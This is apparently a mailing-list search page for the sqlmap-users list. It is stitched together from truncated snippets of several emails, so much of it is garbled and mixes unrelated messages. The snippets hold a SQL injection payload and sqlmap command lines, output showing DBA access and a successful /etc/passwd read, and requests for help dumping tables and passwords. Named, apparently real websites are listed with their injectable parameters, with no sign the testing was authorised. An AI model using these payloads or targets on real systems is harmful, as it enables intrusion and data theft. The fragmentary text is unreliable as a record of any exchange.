Hi Stampar, Thanks for your email . i try again . with payload hidJumpId=54' OR '54'%3D'54' AND 6149=6149 AND 'izAQ'='izAQ&JumpButton=Go&JumpPage=22 but the result the same . maybe the server filter out the data.thanks you all the same
user is DBA: True[13:53:23] [INFO] fetching database users[13:53:23] [INFO] fetching number of database users[13:53:24] [INFO] retrieved: [13:53:24] [CRITICAL] unable to retrieve the number of database usersbest regards bob--
-- 原始邮件 --发件人: "
ameter 'hidJumpId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] NN: command not found[4]+ Stopped ./sqlmap.py -u "http://XXXp" --data "hidJumpId=54%27%20OR%20%2754%27%3D%2754&JumpButton=Go&JumpPage=22" --param-del=[4]
ToNtSlashes(filename)
File "/pentest/database/sqlmap/lib/core/common.py", line 1500, in
posixToNtSlashes
return filepath.replace('/', '\\')
AttributeError: 'NoneType' object has no attribute 'replace'
[*] shutting down at 20:15:56
I update to sqlmap/1.0-dev (r5135)
now .but problems all the same .
i use --technique=B --technique=T too .
-- --
??: "Iago Sousa"<146050...@gmail.com>;
: 2012??6??25??(??) ????7:15
??: "Bob";
:
0AND%20%27Cqlm%27=%27Cqlm";
is there anyone can use sqlmap find injected point?
best regards
Bob--
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landsc
http://www.alcosens.com/fsbClient/ezboard.jsp
injectable parameter is: "searchWord"
www.mobcstyle.com/goods/search.php", using HTTP method GET. The injectable
parameter is: "search_price_start
is there anyone can use sqlmap find injected point
Hi all,
I am use sqlmap to retrieve database
current-user and current-db can workable
retrieve tables ,passwords etc will response time out
Could you tell me what is the problem ? how i can retrieve tables and passwords
?
Thanks
bob
[09:56:07] [INFO] testing connection to the
Hi all ,
i use file-read to retrieve file on server .
/etc/passwd can workable
but others response is as followed .
16:44:14] [INFO] resuming back-end DBMS 'mysql 5' from session file
[16:44:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a
I meet the problem with sqlmap working with sql server 2008 . the details if
below . sometimes can retrieval db,and user ,but sometimes is show below .
Place: GET
Parameter: nclassid
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: classid=4&n
[17:18:15] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with
the latest development version from the Subversion repository. If the exception
persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the
following text and any information required to reproduce the bug.
is well written and covers most of what a beginner
would want to know. I appreciate it
Thanks!
Bob
- Original Message -
From: Miroslav Stampar
To: Bob Simonoff
Cc: sqlmap-users@lists.sourceforge.net
Sent: Sunday, December 11, 2011 3:37 AM
Subject: Re: [sqlmap-users] A
aptured. I looked for
each of the listed parameters in the posted data and they do not appear. (note
there are more parameters but I would rather send those privately if possible).
I am running a recent svn extract of the dev stream
everyone else too. I will try those if I can not get the latest version
working.
Bob
- Original Message -
From: Miroslav Stampar
To: Brandon Perry
Cc: sqlmap-users@lists.sourceforge.net
Sent: Monday, November 21, 2011 4:20 PM
Subject: Re: [sqlmap-users] %26 as part of a POST
argument of the command
line, but python is also at play here. I have not found an escape sequence
that allows both windows and python to be happy. I have tried various
combinations of ^, \, and %% to no avail.
So an example of post data would be:
--data="fld%26First=Bob&fld%26Last=Jones&quo
15 matches
Mail list logo
